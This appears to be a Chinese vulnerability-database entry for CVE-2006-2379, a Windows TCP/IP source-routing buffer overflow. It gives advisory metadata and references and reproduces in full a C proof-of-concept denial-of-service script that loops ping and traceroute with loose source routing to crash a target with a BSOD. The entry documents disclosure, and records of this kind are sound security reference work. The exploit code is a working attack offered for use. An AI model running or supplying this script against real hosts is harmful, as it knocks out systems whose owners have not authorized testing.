Microsoft Windows TCP/IP协议驱动 远程溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110538 漏洞类型 缓冲区错误
发布时间 2006-06-30 更新时间 2006-07-04
CVE编号 CVE-2006-2379 CNNVD-ID CNNVD-200606-283
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/1967
https://www.securityfocus.com/bid/18374
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-283
|漏洞详情
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。 Microsoft Windows的TCP/IP协议驱动处理特定畸形的IP源路由报文时存在缓冲区溢出漏洞,远程攻击者可以通过发送有Loose Source and Record Route选项的特制ICMP报文触发这个漏洞,导致tcpip.sys或ntoskrnl.exe中出现错误而造成拒绝服务或执行任意指令。 默认情况下,Windows系统的路由及远程访问服务是关闭的,也就是说默认情况下系统不受此漏洞影响。
|漏洞EXP
/*

####################################
# 
# Windows TCP/IP source routing poc
# C version...
#
# by Preddy
#
# RootShell Security Group
#
# Shoutz 2: 
#
#  Jimmy and ByteCoder + 
#  Rs Crew + 
#  Rest of the world :D
#
#
####################################

Compile:

gcc win-tcpip-dos.c -o wintcpipdos

Info:

Published:     14.06.2006
Source:        ANDREYMINAEV
Type:          remote
Level:         9/10

Buffer overflow on ICMP packets with 
Loose Source and Record Route IP options. 
Short message translation: There are DoS 
conditions in Windows 2000 built-in NAT 
server. Tested configuration: Windows 2000 
English Standard/Advanced Service Pack 4 
+ Update Rollup 1 for Service Pack 4 with 
NAT server enabled. While routing packets 
with options "Loose Source and Record Route" 
defined by RFC 791 through server, Windows 
crashes to BSOD with error in tcpip.sys or 
ntoskrnl.exe, or system hangs or system 
began instable work. It doesn't metter if 
packets are from internal or external 
networks. Use attached script to test 
vulnerability. On Windows 2003 problem 
doesn't present. It's also likely same 
problem to present in Windows 2000 + 
ISA 2000. Code execution is potentially possible.

*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>


main(int argc, char *argv[])
{

char dos_ip[255];
char mysystem[10];
char ping[20+1];
char trace[100];


if(argc != 3)
{

printf("\n\nWindows TCP/IP source routing Dos - by Preddy\n");
printf("Usage: %s <ip> <mysystem>\n", argv[0]);
printf("Example: %s 127.0.0.1 linux\n", argv[0]);
printf("Uses the ping and the traceroute utility on your system\n", argv[0]);
printf("Should cause a BSOD on the remote system\n");
printf("More info: http://www.security.nnov.ru/Fnews753.html\n\n");
exit(1);
}

strcpy(dos_ip, argv[1]);
strcpy(mysystem, argv[2]);


if((strcmp (argv[2],"linux"))==0)
{

printf("\nTarget: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n\n");


strcpy(ping, "ping -c 1 ");
strncat(ping,argv[1],9);

strcpy(trace, "traceroute -m 1 -g 0.0.0.0 ");
strncat(trace,argv[1],9);


while(1)
{
system(trace);
system(ping);
}

}

if((strcmp (argv[2],"windows"))==0)
{

printf("Target: %s\n", dos_ip);
printf("MySystem: %s\n", mysystem);
printf("Sending Payload...\n");


strcpy(ping, "ping -n 1 ");
strncat(ping,argv[1],9);

strcpy(trace, "tracert -h 1 -j 0.0.0.0 ");
strncat(trace,argv[1],9);


while(1)
{
system(trace);
system(ping);
}

}

}

// milw0rm.com [2006-06-30]
|受影响的产品
Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Wind
|参考资料

来源:US-CERT
名称:VU#722753
链接:http://www.kb.cert.org/vuls/id/722753
来源:US-CERT
名称:TA06-164A
链接:http://www.us-cert.gov/cas/techalerts/TA06-164A.html
来源:BID
名称:18374
链接:http://www.securityfocus.com/bid/18374
来源:VUPEN
名称:ADV-2006-2329
链接:http://www.frsirt.com/english/advisories/2006/2329
来源:SECUNIA
名称:20639
链接:http://secunia.com/advisories/20639
来源:BUGTRAQ
名称:20060628Re[2]:IsWindowsTCP/IPsourceroutingPoCcodeavailable?
链接:http://www.securityfocus.com/archive/1/archive/1/438609/100/0/threaded
来源:BUGTRAQ
名称:20060627Re:IsWindowsTCP/IPsourceroutingPoCcodeavailable?
链接:http://www.securityfocus.com/archive/1/archive/1/438482/100/0/threaded
来源:MS
名称:MS06-032
链接:http://www.microsoft.com/technet/security/bulletin/ms06-032.mspx
来源:FULLDISC
名称:20060625IsWindowsTCP/IPsourceroutingPoCcodeavailable?
链接:http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/46702
来源:SECTRACK
名称:1016290
链接:http://securitytracker.com/id?1016290
来源:XF
名称:win-tcp-ip-driver-bo(26834)
链接:http://xforce.iss.net/xforce/xfdb